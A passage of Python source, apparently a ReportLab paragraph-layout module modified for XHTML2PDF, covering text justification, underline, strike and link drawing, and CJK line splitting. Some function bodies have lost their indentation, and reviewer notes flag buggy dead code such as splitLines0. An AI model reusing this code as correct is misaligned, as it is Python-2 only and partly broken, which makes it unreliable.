    Each source line is whitespace-normalised via _lineClean, then the
    non-empty lines are joined with *joiner* (Python 2: filter() returns
    a list here)."""
    L=filter(truth,map(_lineClean, split(text, '\n')))
    return join(L, joiner)
def setXPos(tx, dx):
    """Shift text object *tx*'s x-origin by *dx* points, dropping moves
    smaller than a millionth of a point to avoid useless PDF operators."""
    if abs(dx) > 1e-6:
        tx.setXPos(dx)
def _leftDrawParaLine(tx, offset, extraspace, words, last=0):
    """Draw a simple (kind==0) line flush left, shifted right by *offset*.

    Returns the x shift applied (the caller undoes cumulative offsets).
    FIX: joins words with ' '.join instead of the Python-2-only
    string.join() (deprecated in 2.x, removed in 3.x) -- behaviour is
    identical since string.join's default separator is a single space.
    """
    setXPos(tx, offset)
    tx._textOut(' '.join(words), 1)
    setXPos(tx, -offset)
    return offset
def _centerDrawParaLine(tx, offset, extraspace, words, last=0):
    """Draw a simple (kind==0) line centred: half the unused *extraspace*
    is added to *offset*.  Returns the x shift applied.

    FIX: ' '.join replaces the Python-2-only string.join() (removed in
    Python 3); the default separator of string.join is a space, so the
    output is byte-identical.
    """
    m = offset + 0.5 * extraspace
    setXPos(tx, m)
    tx._textOut(' '.join(words), 1)
    setXPos(tx, -m)
    return m
def _rightDrawParaLine(tx, offset, extraspace, words, last=0):
    """Draw a simple (kind==0) line flush right: all the unused
    *extraspace* is added to *offset*.  Returns the x shift applied.

    FIX: ' '.join replaces the Python-2-only string.join() (removed in
    Python 3); output is identical.
    """
    m = offset + extraspace
    setXPos(tx, m)
    tx._textOut(' '.join(words), 1)
    setXPos(tx, -m)
    return m
def _justifyDrawParaLine(tx, offset, extraspace, words, last=0):
    """Draw a simple (kind==0) line justified by widening word spaces.

    The last line of a paragraph (*last* true) and single-word lines are
    drawn left-aligned instead.  Returns the x shift applied.
    FIX: ' '.join replaces the Python-2-only string.join() (removed in
    Python 3); output is identical.
    """
    setXPos(tx, offset)
    text = ' '.join(words)
    if last:
        # last one, left align
        tx._textOut(text, 1)
    else:
        nSpaces = len(words) - 1
        if nSpaces:
            # distribute the leftover width across the inter-word gaps
            tx.setWordSpace(extraspace / float(nSpaces))
            tx._textOut(text, 1)
            tx.setWordSpace(0)
        else:
            tx._textOut(text, 1)
    setXPos(tx, -offset)
    return offset
def imgVRange(h, va, fontSize):
    """Return (bottom, top) offsets of an inline object of height *h*
    relative to the text baseline (0), for vertical-alignment spec *va*.

    *va* may be one of the CSS-like keywords handled below, an object with
    a normalizedValue(fontSize) method, or a plain numeric offset."""
    if va == 'baseline':
        bottom = 0
    elif va in ('text-top', 'top'):
        bottom = fontSize - h
    elif va == 'middle':
        bottom = fontSize - (1.2 * fontSize + h) * 0.5
    elif va in ('text-bottom', 'bottom'):
        bottom = fontSize - 1.2 * fontSize
    elif va == 'super':
        bottom = 0.5 * fontSize
    elif va == 'sub':
        bottom = -0.5 * fontSize
    elif hasattr(va, 'normalizedValue'):
        bottom = va.normalizedValue(fontSize)
    else:
        bottom = va  # numeric offset passed straight through
    return bottom, bottom + h
_56=5./6  # assumed ascent fraction of the leading, used by 'max' auto-leading
_16=1./6  # assumed descent fraction of the leading
def _putFragLine(cur_x, tx, line):
    """Emit one styled (kind==1) *line* into text object *tx* starting at x
    offset *cur_x*.

    Handles cbDefn frags (inline images, barcodes, anchors, onDraw
    callbacks) as well as plain text frags, and records background /
    underline / strike / link extents on tx.XtraState so _do_post_text()
    can draw them after the text.
    NOTE(review): depends on private pdfgen text-object fields (_x0, _olb,
    _oleading, _fontname, _fontsize, _canvas) -- tied to reportlab internals.
    """
    xs = tx.XtraState
    cur_y = xs.cur_y
    x0 = tx._x0
    autoLeading = xs.autoLeading
    leading = xs.leading
    cur_x += xs.leftIndent
    dal = autoLeading in ('min','max')
    if dal:
        # derive this line's leading from its measured ascent/descent
        if autoLeading=='max':
            ascent = max(_56*leading,line.ascent)
            descent = max(_16*leading,-line.descent)
        else:
            ascent = line.ascent
            descent = -line.descent
        leading = ascent+descent
    if tx._leading!=leading:
        tx.setLeading(leading)
    if dal:
        # re-anchor the text origin so the previous line's bottom (_olb)
        # and this line's ascent stay consistent when leading changes
        olb = tx._olb
        if olb is not None:
            xcy = olb-ascent
            if tx._oleading!=leading:
                cur_y += leading - tx._oleading
            if abs(xcy-cur_y)>1e-8:
                cur_y = xcy
                tx.setTextOrigin(x0,cur_y)
                xs.cur_y = cur_y
        tx._olb = cur_y - descent
        tx._oleading = leading
    # ws: current justification word-space; every recorded extent below is
    # widened by nSpaces*ws to stay aligned with the justified glyphs
    ws = getattr(tx,'_wordSpace',0)
    nSpaces = 0
    words = line.words
    for f in words:
        if hasattr(f,'cbDefn'):
            # non-text frag: image / barcode / anchor / onDraw callback
            cbDefn = f.cbDefn
            kind = cbDefn.kind
            if kind=='img':
                #draw image cbDefn,cur_y,cur_x
                w = cbDefn.width
                h = cbDefn.height
                txfs = tx._fontsize
                if txfs is None:
                    txfs = xs.style.fontSize
                iy0,iy1 = imgVRange(h,cbDefn.valign,txfs)
                cur_x_s = cur_x + nSpaces*ws
                # print "draw", id(f), id(cbDefn.image), repr(dal), cur_y, iy0, iy1, h
                tx._canvas.drawImage(cbDefn.image.getImage(),cur_x_s,cur_y+iy0,w,h,mask='auto')
                cur_x += w
                cur_x_s += w
                setXPos(tx,cur_x_s-tx._x0)
            elif kind=='barcode':
                barcode = cbDefn.barcode
                w = cbDefn.width
                h = cbDefn.height
                txfs = tx._fontsize
                if txfs is None:
                    txfs = xs.style.fontSize
                iy0, iy1 = imgVRange(h, cbDefn.valign, txfs)
                cur_x_s = cur_x + nSpaces*ws
                barcode.draw(canvas=tx._canvas, xoffset=cur_x_s)
                cur_x += w
                cur_x_s += w
                setXPos(tx, cur_x_s-tx._x0)
            else:
                name = cbDefn.name
                if kind=='anchor':
                    tx._canvas.bookmarkHorizontal(name,cur_x,cur_y+leading)
                else:
                    func = getattr(tx._canvas,name,None)
                    if not func:
                        raise AttributeError("Missing %s callback attribute '%s'" % (kind,name))
                    func(tx._canvas,kind,cbDefn.label)
            if f is words[-1]:
                # flush the text object even when the line ends on a non-text frag
                if not tx._fontname:
                    tx.setFont(xs.style.fontName,xs.style.fontSize)
                tx._textOut('',1)
            elif kind=='img':
                tx._textOut('',1)
        else:
            # plain text frag
            cur_x_s = cur_x + nSpaces*ws
            if (tx._fontname,tx._fontsize)!=(f.fontName,f.fontSize):
                tx._setFont(f.fontName, f.fontSize)
            if xs.textColor!=f.textColor:
                xs.textColor = f.textColor
                tx.setFillColor(f.textColor)
            if xs.rise!=f.rise:
                xs.rise=f.rise
                tx.setRise(f.rise)
            text = f.text
            tx._textOut(text,f is words[-1]) # cheap textOut
            # XXX Modified for XHTML2PDF
            # Background colors (done like underline)
            # print "#", repr(f.text), f.fontSize, f.backColor, f.underline
            if hasattr(f, "backColor"):
                if xs.backgroundColor != f.backColor or xs.backgroundFontSize != f.fontSize:
                    # close the previous background run before opening a new one
                    if xs.backgroundColor is not None:
                        xs.backgrounds.append((xs.background_x, cur_x_s, xs.backgroundColor, xs.backgroundFontSize))
                    xs.background_x = cur_x_s
                    xs.backgroundColor = f.backColor
                    xs.backgroundFontSize = f.fontSize
            # Underline
            if not xs.underline and f.underline:
                xs.underline = 1
                xs.underline_x = cur_x_s
                xs.underlineColor = f.textColor
            elif xs.underline:
                if not f.underline:
                    xs.underline = 0
                    xs.underlines.append((xs.underline_x, cur_x_s, xs.underlineColor))
                    xs.underlineColor = None
                elif xs.textColor != xs.underlineColor:
                    # colour changed mid-underline: close the run, start a new one
                    xs.underlines.append((xs.underline_x, cur_x_s, xs.underlineColor))
                    xs.underlineColor = xs.textColor
                    xs.underline_x = cur_x_s
            # Strike
            if not xs.strike and f.strike:
                xs.strike = 1
                xs.strike_x = cur_x_s
                xs.strikeColor = f.textColor
                # XXX Modified for XHTML2PDF
                xs.strikeFontSize = f.fontSize
            elif xs.strike:
                if not f.strike:
                    xs.strike = 0
                    # XXX Modified for XHTML2PDF
                    xs.strikes.append((xs.strike_x, cur_x_s, xs.strikeColor, xs.strikeFontSize))
                    xs.strikeColor = None
                    xs.strikeFontSize = None
                elif xs.textColor != xs.strikeColor:
                    xs.strikes.append((xs.strike_x, cur_x_s, xs.strikeColor, xs.strikeFontSize))
                    xs.strikeColor = xs.textColor
                    xs.strikeFontSize = f.fontSize
                    xs.strike_x = cur_x_s
            if f.link and not xs.link:
                if not xs.link:
                    xs.link = f.link
                    xs.link_x = cur_x_s
                    xs.linkColor = xs.textColor
            elif xs.link:
                if not f.link:
                    xs.links.append( (xs.link_x, cur_x_s, xs.link, xs.linkColor) )
                    xs.link = None
                    xs.linkColor = None
                elif f.link!=xs.link or xs.textColor!=xs.linkColor:
                    xs.links.append( (xs.link_x, cur_x_s, xs.link, xs.linkColor) )
                    xs.link = f.link
                    xs.link_x = cur_x_s
                    xs.linkColor = xs.textColor
            txtlen = tx._canvas.stringWidth(text, tx._fontname, tx._fontsize)
            cur_x += txtlen
            nSpaces += text.count(' ')
    # end of line: close any decoration runs still open.
    # NOTE(review): 'f' below is the for-loop variable leaking out of the
    # loop, i.e. the line's last frag -- confirm this is intended.
    cur_x_s = cur_x+(nSpaces-1)*ws
    # XXX Modified for XHTML2PDF
    # Underline
    if xs.underline:
        xs.underlines.append((xs.underline_x, cur_x_s, xs.underlineColor))
    # XXX Modified for XHTML2PDF
    # Backcolor
    if hasattr(f, "backColor"):
        if xs.backgroundColor is not None:
            xs.backgrounds.append((xs.background_x, cur_x_s, xs.backgroundColor, xs.backgroundFontSize))
    # XXX Modified for XHTML2PDF
    # Strike
    if xs.strike:
        xs.strikes.append((xs.strike_x, cur_x_s, xs.strikeColor, xs.strikeFontSize))
    if xs.link:
        xs.links.append( (xs.link_x, cur_x_s, xs.link,xs.linkColor) )
    if tx._x0!=x0:
        setXPos(tx,x0-tx._x0)
def _leftDrawParaLineX( tx, offset, line, last=0):
    """Draw a styled (kind==1) line flush left, shifted right by *offset*."""
    setXPos(tx,offset)
    _putFragLine(offset, tx, line)
    setXPos(tx,-offset)
def _centerDrawParaLineX(tx, offset, line, last=0):
    """Draw a styled (kind==1) line centred: shift by *offset* plus half
    of the line's unused extraSpace."""
    shift = offset + 0.5 * line.extraSpace
    setXPos(tx, shift)
    _putFragLine(shift, tx, line)
    setXPos(tx, -shift)
def _rightDrawParaLineX(tx, offset, line, last=0):
    """Draw a styled (kind==1) line flush right: shift by *offset* plus the
    line's entire unused extraSpace."""
    shift = offset + line.extraSpace
    setXPos(tx, shift)
    _putFragLine(shift, tx, line)
    setXPos(tx, -shift)
def _justifyDrawParaLineX(tx, offset, line, last=0):
    """Draw a styled (kind==1) line justified by widening word spaces;
    the paragraph's last line, single-word lines, lines with (almost) no
    spare width and explicit line breaks are drawn unmodified."""
    setXPos(tx, offset)
    spare = line.extraSpace
    gaps = line.wordCount - 1
    # keep the original short-circuit order: line.lineBreak may be absent
    # on lines produced by the CJK splitter and must be tested last
    if last or not gaps or abs(spare) <= 1e-8 or line.lineBreak:
        _putFragLine(offset, tx, line)  # no space modification
    else:
        tx.setWordSpace(spare / float(gaps))
        _putFragLine(offset, tx, line)
        tx.setWordSpace(0)
    setXPos(tx, -offset)
# XXX Modified for XHTML2PDF
# !!! Important, don't import accelerators !!!
#try:
# from _rl_accel import _sameFrag
#except ImportError:
# try:
# from reportlab.lib._rl_accel import _sameFrag
# except ImportError:
def _sameFrag(f,g):
'returns 1 if two ParaFrags map out the same'
if (hasattr(f,'cbDefn') or hasattr(g,'cbDefn')
or hasattr(f,'lineBreak') or hasattr(g,'lineBreak')): return 0
for a in ('fontName', 'fontSize', 'textColor', 'backColor', 'rise', 'underline', 'strike', 'link'):
if getattr(f,a,None)!=getattr(g,a,None): return 0
return 1
def _getFragWords(frags):
    ''' given a Parafrag list return a list of fragwords
        [[size, (f00,w00), ..., (f0n,w0n)],....,[size, (fm0,wm0), ..., (f0n,wmn)]]
        each pair f,w represents a style and some string
        each sublist represents a word

        Zero-width cbDefn frags attach to the current word; non-zero-width
        ones and lineBreak frags each become a word of their own.  After a
        lineBreak the next frag's leading whitespace is stripped
        (hangingStrip).
    '''
    R = []                 # finished words
    W = []                 # (frag, text) pieces of the word being built
    n = 0                  # accumulated width of W
    hangingStrip = False   # strip leading space of the frag after a <br/>
    for f in frags:
        text = f.text
        #del f.text # we can't do this until we sort out splitting
        #            of paragraphs
        if text!='':
            if hangingStrip:
                hangingStrip = False
                text = text.lstrip()
            #if type(text) is str:
            #    text = text.decode('utf8')
            S = split(text)
            if S==[]: S = ['']
            # leading whitespace ends the word carried over from the
            # previous frag
            if W!=[] and text[0] in whitespace:
                W.insert(0,n)
                R.append(W)
                W = []
                n = 0
            # every piece except the last is a complete word
            for w in S[:-1]:
                W.append((f,w))
                n += stringWidth(w, f.fontName, f.fontSize)
                W.insert(0,n)
                R.append(W)
                W = []
                n = 0
            # the last piece may continue into the next frag
            w = S[-1]
            W.append((f,w))
            n += stringWidth(w, f.fontName, f.fontSize)
            if text and text[-1] in whitespace:
                W.insert(0,n)
                R.append(W)
                W = []
                n = 0
        elif hasattr(f,'cbDefn'):
            w = getattr(f.cbDefn,'width',0)
            if w:
                # a sized object (e.g. inline image) is a word by itself
                if W!=[]:
                    W.insert(0,n)
                    R.append(W)
                    W = []
                    n = 0
                R.append([w,(f,'')])
            else:
                # zero-width callback rides along with the current word
                W.append((f,''))
        elif hasattr(f, 'lineBreak'):
            #pass the frag through.  The line breaker will scan for it.
            if W!=[]:
                W.insert(0,n)
                R.append(W)
                W = []
                n = 0
            R.append([0,(f,'')])
            hangingStrip = True
    if W!=[]:
        W.insert(0,n)
        R.append(W)
    return R
def _split_blParaSimple(blPara,start,stop):
f = blPara.clone()
for a in ('lines', 'kind', 'text'):
if hasattr(f,a): delattr(f,a)
f.words = []
for l in blPara.lines[start:stop]:
for w in l[1]:
f.words.append(w)
return [f]
def _split_blParaHard(blPara,start,stop):
f = []
lines = blPara.lines[start:stop]
for l in lines:
for w in l.words:
f.append(w)
if l is not lines[-1]:
i = len(f)-1
while i>=0 and hasattr(f[i],'cbDefn') and not getattr(f[i].cbDefn,'width',0): i -= 1
if i>=0:
g = f[i]
if not g.text: g.text = ' '
elif g.text[-1]!=' ': g.text += ' '
return f
def _drawBullet(canvas, offset, cur_y, bulletText, style):
    '''draw a bullet; text could be a simple string or a frag list.

    Returns the (possibly enlarged) first-line x offset so a wide bullet
    pushes the paragraph text right instead of overprinting it.
    Python 2 only: tests against basestring.'''
    tx2 = canvas.beginText(style.bulletIndent, cur_y+getattr(style,"bulletOffsetY",0))
    tx2.setFont(style.bulletFontName, style.bulletFontSize)
    tx2.setFillColor(hasattr(style,'bulletColor') and style.bulletColor or style.textColor)
    if isinstance(bulletText,basestring):
        tx2.textOut(bulletText)
    else:
        for f in bulletText:
            if hasattr(f, "image"):
                # image bullet: drawn directly on the canvas, right-aligned
                # against the paragraph's left indent with a small gap
                image = f.image
                width = image.drawWidth
                height = image.drawHeight
                gap = style.bulletFontSize * 0.25
                img = image.getImage()
                # print style.bulletIndent, offset, width
                canvas.drawImage(
                    img,
                    style.leftIndent - width - gap,
                    cur_y+getattr(style,"bulletOffsetY",0),
                    width,
                    height)
            else:
                tx2.setFont(f.fontName, f.fontSize)
                tx2.setFillColor(f.textColor)
                tx2.textOut(f.text)
    canvas.drawText(tx2)
    #AR making definition lists a bit less ugly
    #bulletEnd = tx2.getX()
    bulletEnd = tx2.getX() + style.bulletFontSize * 0.6
    offset = max(offset,bulletEnd - style.leftIndent)
    return offset
def _handleBulletWidth(bulletText,style,maxWidths):
    '''work out bullet width and adjust maxWidths[0] if necessary

    Mutates maxWidths in place: if the bullet (plus a 0.6*fontSize gap)
    would overrun the first-line indent, the first line loses that much
    width.  Python 2 only: tests against basestring.
    '''
    if bulletText:
        if isinstance(bulletText,basestring):
            bulletWidth = stringWidth( bulletText, style.bulletFontName, style.bulletFontSize)
        else:
            #it's a list of fragments
            bulletWidth = 0
            for f in bulletText:
                bulletWidth = bulletWidth + stringWidth(f.text, f.fontName, f.fontSize)
        bulletRight = style.bulletIndent + bulletWidth + 0.6 * style.bulletFontSize
        indent = style.leftIndent+style.firstLineIndent
        if bulletRight > indent:
            #..then it overruns, and we have less space available on line 1
            maxWidths[0] -= (bulletRight - indent)
def splitLines0(frags,widths):
    '''
    given a list of ParaFrags we return a list of ParaLines

    each ParaLine has
    1)  ExtraSpace
    2)  blankCount
    3)  [textDefns....]
        each text definition is a (ParaFrag, start, limit) triplet

    NOTE(review): this function appears to be unfinished/dead code (it is
    not called anywhere in this module and never returns `lines`).  Known
    defects, left as-is rather than guessed at:
      * `if j<0: j==lim` is a no-op comparison (presumably meant `j = lim`)
      * `g[2] = j` assigns into a tuple -> would raise TypeError
      * `g.text[lim]` accesses .text on a tuple -> would raise AttributeError
      * `text` is referenced before assignment on the first pass of the
        inner while loop
    '''
    #initialise the algorithm
    lines = []
    lineNum = 0
    maxW = widths[lineNum]
    i = -1
    l = len(frags)
    lim = start = 0
    while 1:
        #find a non whitespace character
        while i<l:
            while start<lim and text[start]==' ': start += 1
            if start==lim:
                i += 1
                if i==l: break
                start = 0
                f = frags[i]
                text = f.text
                lim = len(text)
            else:
                break # we found one
        if start==lim: break #if we didn't find one we are done
        #start of a line
        g = (None,None,None)
        line = []
        cLen = 0
        nSpaces = 0
        while cLen<maxW:
            j = text.find(' ',start)
            if j<0: j==lim
            w = stringWidth(text[start:j],f.fontName,f.fontSize)
            cLen += w
            if cLen>maxW and line!=[]:
                cLen = cLen-w
                #this is the end of the line
                while g.text[lim]==' ':
                    lim = lim - 1
                    nSpaces = nSpaces-1
                break
            if j<0: j = lim
            if g[0] is f: g[2] = j #extend
            else:
                g = (f,start,j)
                line.append(g)
            if j==lim:
                i += 1
def _do_under_line(i, t_off, ws, tx, lm=-0.125):
y = tx.XtraState.cur_y - i*tx.XtraState.style.leading + lm*tx.XtraState.f.fontSize
textlen = tx._canvas.stringWidth(join(tx.XtraState.lines[i][1]), tx._fontname, tx._fontsize)
tx._canvas.line(t_off, y, t_off+textlen+ws, y)
# accepts e.g. 'http', 'mailto', 'pdf' -- any alpha followed by alnum/-/+
_scheme_re = re.compile('^[a-zA-Z][-+a-zA-Z0-9]+$')
def _doLink(tx,link,rect):
    """Attach hyperlink *link* to canvas rectangle *rect* (x1,y1,x2,y2).

    URLs with a real scheme become URI (or GoToR for 'pdf:') annotations;
    everything else -- including '#anchor' and 'document:' targets -- becomes
    an internal linkRect to a named destination.
    Python 2 only: tests against unicode."""
    if isinstance(link,unicode):
        link = link.encode('utf8')
    parts = link.split(':',1)
    scheme = len(parts)==2 and parts[0].lower() or ''
    if _scheme_re.match(scheme) and scheme!='document':
        kind=scheme.lower()=='pdf' and 'GoToR' or 'URI'
        if kind=='GoToR': link = parts[1]
        tx._canvas.linkURL(link, rect, relative=1, kind=kind)
    else:
        if link[0]=='#':
            link = link[1:]
            scheme=''
        tx._canvas.linkRect("", scheme!='document' and link or parts[1], rect, relative=1)
def _do_link_line(i, t_off, ws, tx):
    """Emit the clickable rectangle for simple-paragraph (kind==0) line *i*,
    sized from the joined words of that line plus justification space *ws*.

    FIX: ' '.join replaces the Python-2-only string.join() (removed in
    Python 3); output is identical since string.join defaults to a single
    space separator.
    """
    xs = tx.XtraState
    leading = xs.style.leading
    y = xs.cur_y - i * leading - xs.f.fontSize / 8.0  # 8.0 factor copied from para.py
    text = ' '.join(xs.lines[i][1])
    textlen = tx._canvas.stringWidth(text, tx._fontname, tx._fontsize)
    _doLink(tx, xs.link, (t_off, y, t_off + textlen + ws, y + leading))
# XXX Modified for XHTML2PDF
def _do_post_text(tx):
    """
    Draw everything recorded while a line was emitted -- backgrounds,
    underlines, strikes and link rectangles -- then advance xs.cur_y by one
    leading and reset the per-line accumulators.

    Variable guide (as far as this code shows):
        tx       text object carrying XtraState with the per-line records
        leading  height of lines (possibly recomputed from auto-leading)
        ff       1/8 of the font size
        y0       the baseline position
        y        1/8 of the font size below the baseline
    """
    xs = tx.XtraState
    leading = xs.style.leading
    autoLeading = xs.autoLeading
    f = xs.f
    if autoLeading=='max':
        # leading = max(leading, f.fontSize)
        leading = max(leading, LEADING_FACTOR*f.fontSize)
    elif autoLeading=='min':
        leading = LEADING_FACTOR*f.fontSize
    ff = 0.125*f.fontSize
    y0 = xs.cur_y
    y = y0 - ff
    # Background
    for x1, x2, c, fs in xs.backgrounds:
        # each run remembers its own font size so the box height matches
        inlineFF = fs * 0.125
        gap = inlineFF * 1.25
        tx._canvas.setFillColor(c)
        tx._canvas.rect(x1, y - gap, x2 - x1, fs + 1, fill=1, stroke=0)
        # tx._canvas.rect(x1, y, x2 - x1, fs, fill=1, stroke=0)
    xs.backgrounds = []
    xs.background = 0
    xs.backgroundColor = None
    xs.backgroundFontSize = None
    # Underline
    yUnderline = y0 - 1.5 * ff
    tx._canvas.setLineWidth(ff * 0.75)
    csc = None  # current stroke colour, to avoid redundant setStrokeColor calls
    for x1,x2,c in xs.underlines:
        if c!=csc:
            tx._canvas.setStrokeColor(c)
            csc = c
        tx._canvas.line(x1, yUnderline, x2, yUnderline)
    xs.underlines = []
    xs.underline=0
    xs.underlineColor=None
    # Strike
    for x1,x2,c,fs in xs.strikes:
        inlineFF = fs * 0.125
        ys = y0 + 2 * inlineFF  # strike sits above the baseline
        if c!=csc:
            tx._canvas.setStrokeColor(c)
            csc = c
        tx._canvas.setLineWidth(inlineFF * 0.75)
        tx._canvas.line(x1, ys, x2, ys)
    xs.strikes = []
    xs.strike=0
    xs.strikeColor=None
    yl = y + leading
    for x1,x2,link,c in xs.links:
        # No automatic underlining for links, never!
        _doLink(tx, link, (x1, y, x2, yl))
    xs.links = []
    xs.link=None
    xs.linkColor=None
    xs.cur_y -= leading
def textTransformFrags(frags,style):
    """Apply style.textTransform ('lowercase'/'uppercase'/'capitalize'/
    'none') to every frag's text in place.

    Python 2 only: transforms are unicode methods and each frag's UTF-8
    byte text is decoded/re-encoded around them.  'capitalize' tracks word
    boundaries across frags (pb) so a word split over two frags is not
    re-titled mid-word."""
    tt = style.textTransform
    if tt:
        tt=tt.lower()
        if tt=='lowercase':
            tt = unicode.lower
        elif tt=='uppercase':
            tt = unicode.upper
        elif tt=='capitalize':
            tt = unicode.title
        elif tt=='none':
            return
        else:
            raise ValueError('ParaStyle.textTransform value %r is invalid' % style.textTransform)
        n = len(frags)
        if n==1:
            #single fragment the easy case
            frags[0].text = tt(frags[0].text.decode('utf8')).encode('utf8')
        elif tt is unicode.title:
            pb = True  # True when the previous frag ended on a word boundary
            for f in frags:
                t = f.text
                if not t: continue
                u = t.decode('utf8')
                if u.startswith(u' ') or pb:
                    u = tt(u)
                else:
                    # mid-word start: only title-case from the first space on
                    i = u.find(u' ')
                    if i>=0:
                        u = u[:i]+tt(u[i:])
                pb = u.endswith(u' ')
                f.text = u.encode('utf8')
        else:
            for f in frags:
                t = f.text
                if not t: continue
                f.text = tt(t.decode('utf8')).encode('utf8')
class cjkU(unicode):
    '''simple unicode subclass holding a single glyph together with the
    frag it came from and its rendered width (Python 2 only).

    Width is taken from the frag's cbDefn.width for callback frags,
    otherwise measured with stringWidth in the frag's font.'''
    def __new__(cls,value,frag,encoding):
        self = unicode.__new__(cls,value)
        self._frag = frag
        if hasattr(frag,'cbDefn'):
            w = getattr(frag.cbDefn,'width',0)
            self._width = w
        else:
            self._width = stringWidth(value,frag.fontName,frag.fontSize)
        return self
    # read-only accessors for the stashed frag and width
    frag = property(lambda self: self._frag)
    width = property(lambda self: self._width)
def makeCJKParaLine(U,extraSpace,calcBounds):
    """Build a FragLine from a run of cjkU glyphs *U*, merging consecutive
    glyphs whose frags share identical styling (_sameFrag) into single
    words.  When *calcBounds* is true, ascent/descent account for inline
    images via imgVRange.

    Note the dummy-first-word trick: the loop seeds words with an empty
    FragLine() sentinel which the final words[1:] slices away."""
    words = []
    CW = []            # glyphs accumulated for the current same-style word
    f0 = FragLine()    # sentinel "previous frag"; never matches a real frag
    maxSize = maxAscent = minDescent = 0
    for u in U:
        f = u.frag
        fontSize = f.fontSize
        if calcBounds:
            cbDefn = getattr(f,'cbDefn',None)
            if getattr(cbDefn,'width',0):
                descent, ascent = imgVRange(cbDefn.height,cbDefn.valign,fontSize)
            else:
                ascent, descent = getAscentDescent(f.fontName,fontSize)
        else:
            ascent, descent = getAscentDescent(f.fontName,fontSize)
        maxSize = max(maxSize,fontSize)
        maxAscent = max(maxAscent,ascent)
        minDescent = min(minDescent,descent)
        if not _sameFrag(f0,f):
            # style changed: flush the previous word and start a new one
            f0=f0.clone()
            f0.text = u''.join(CW)
            words.append(f0)
            CW = []
            f0 = f
        CW.append(u)
    if CW:
        f0=f0.clone()
        f0.text = u''.join(CW)
        words.append(f0)
    # words[1:] drops the sentinel flushed by the first real frag
    return FragLine(kind=1,extraSpace=extraSpace,wordCount=1,words=words[1:],fontSize=maxSize,ascent=maxAscent,descent=minDescent)
def cjkFragSplit(frags, maxWidths, calcBounds, encoding='utf8'):
    '''This attempts to be wordSplit for frags using the dumb algorithm:
    explode the frags into single cjkU glyphs, then greedily pack glyphs
    into lines against maxWidths, letting a forbidden line-start character
    hang into the right margin (kinsoku shori).

    NOTE(review): `i += 1` / `i -= 1` below mutate the for-loop variable,
    which does NOT affect the next iteration of `for i, u in enumerate(U)`;
    likewise `widthUsed = w` after a hanging character looks suspect.
    Preserved verbatim -- confirm against upstream reportlab before fixing.
    '''
    from reportlab.rl_config import _FUZZ
    U = []  #get a list of single glyphs with their widths etc etc
    for f in frags:
        text = f.text
        if not isinstance(text,unicode):
            text = text.decode(encoding)
        if text:
            U.extend([cjkU(t,f,encoding) for t in text])
        else:
            U.append(cjkU(text,f,encoding))
    lines = []
    widthUsed = lineStartPos = 0
    maxWidth = maxWidths[0]
    for i, u in enumerate(U):
        w = u.width
        widthUsed += w
        lineBreak = hasattr(u.frag,'lineBreak')
        endLine = (widthUsed>maxWidth + _FUZZ and widthUsed>0) or lineBreak
        if endLine:
            if lineBreak: continue
            extraSpace = maxWidth - widthUsed + w
            #This is the most important of the Japanese typography rules.
            #if next character cannot start a line, wrap it up to this line so it hangs
            #in the right margin. We won't do two or more though - that's unlikely and
            #would result in growing ugliness.
            nextChar = U[i]
            if nextChar in ALL_CANNOT_START:
                extraSpace -= w
                i += 1
            lines.append(makeCJKParaLine(U[lineStartPos:i],extraSpace,calcBounds))
            try:
                maxWidth = maxWidths[len(lines)]
            except IndexError:
                maxWidth = maxWidths[-1] # use the last one
            lineStartPos = i
            widthUsed = w
            i -= 1
    #any characters left?
    if widthUsed > 0:
        lines.append(makeCJKParaLine(U[lineStartPos:],maxWidth-widthUsed,calcBounds))
    return ParaLines(kind=1,lines=lines)
class Paragraph(Flowable):
""" Paragraph(text, style, bulletText=None, caseSensitive=1)
text a string of stuff to go into the paragraph.
style is a style definition as in reportlab.lib.styles.
bulletText is an optional bullet defintion.
caseSensitive set this to 0 if you want the markup tags and their attributes to be case-insensitive.
This class is a flowable that can format a block of text
into a paragraph with a given style.
The paragraph Text can contain XML-like markup including the tags:
<b> ... </b> - bold
<i> ... </i> - italics
<u> ... </u> - underline
<strike> ... </strike> - strike through
<super> ... </super> - superscript
<sub> ... </sub> - subscript
<font name=fontfamily/fontname color=colorname size=float>
<onDraw name=callable label="a label">
<link>link text</link>
attributes of links
size/fontSize=num
name/face/fontName=name
fg/textColor/color=color
backcolor/backColor/bgcolor=color
dest/destination/target/href/link=target
<a>anchor text</a>
attributes of anchors
fontSize=num
fontName=name
fg/textColor/color=color
backcolor/backColor/bgcolor=color
href=href
<a name="anchorpoint"/>
<unichar name="unicode character name"/>
<unichar value="unicode code point"/>
<img src="path" width="1in" height="1in" valign="bottom"/>
The whole may be surrounded by <para> </para> tags
The <b> and <i> tags will work for the built-in fonts (Helvetica
/Times / Courier). For other fonts you need to register a family
of 4 fonts using reportlab.pdfbase.pdfmetrics.registerFont; then
use the addMapping function to tell the library that these 4 fonts
form a family e.g.
from reportlab.lib.fonts import addMapping
addMapping('Vera', 0, 0, 'Vera') #normal
addMapping('Vera', 0, 1, 'Vera-Italic') #italic
addMapping('Vera', 1, 0, 'Vera-Bold') #bold
addMapping('Vera', 1, 1, 'Vera-BoldItalic') #italic and bold
It will also be able to handle any MathML specified Greek characters.
"""
def __init__(self, text, style, bulletText = None, frags=None, caseSensitive=1, encoding='utf8'):
self.caseSensitive = caseSensitive
self.encoding = encoding
self._setup(text, style, bulletText, frags, cleanBlockQuotedText)
def __repr__(self):
n = self.__class__.__name__
L = [n+"("]
keys = self.__dict__.keys()
for k in keys:
v = getattr(self, k)
rk = repr(k)
rv = repr(v)
rk = " "+rk.replace("\n", "\n ")
rv = " "+rk.replace("\n", "\n ")
L.append(rk)
L.append(rv)
L.append(") #"+n)
return '\n'.join(L)
    def _setup(self, text, style, bulletText, frags, cleaner):
        """Parse *text* into frags (unless pre-parsed *frags* are supplied)
        and stash text/frags/style/bulletText on self.

        Uses the module-level _parser singleton, whose caseSensitive flag
        is set from this instance on every call."""
        if frags is None:
            text = cleaner(text)
            _parser.caseSensitive = self.caseSensitive
            style, frags, bulletTextFrags = _parser.parse(text,style)
            if frags is None:
                raise ValueError("xml parser error (%s) in paragraph beginning\n'%s'"\
                    % (_parser.errors[0],text[:min(30,len(text))]))
            textTransformFrags(frags,style)
            # markup inside the bullet overrides the plain bulletText argument
            if bulletTextFrags: bulletText = bulletTextFrags
        #AR hack
        self.text = text
        self.frags = frags
        self.style = style
        self.bulletText = bulletText
        self.debug = PARAGRAPH_DEBUG  #turn this on to see a pretty one with all the margins etc.
    def wrap(self, availWidth, availHeight):
        """Flowable protocol: break the text into lines for *availWidth*
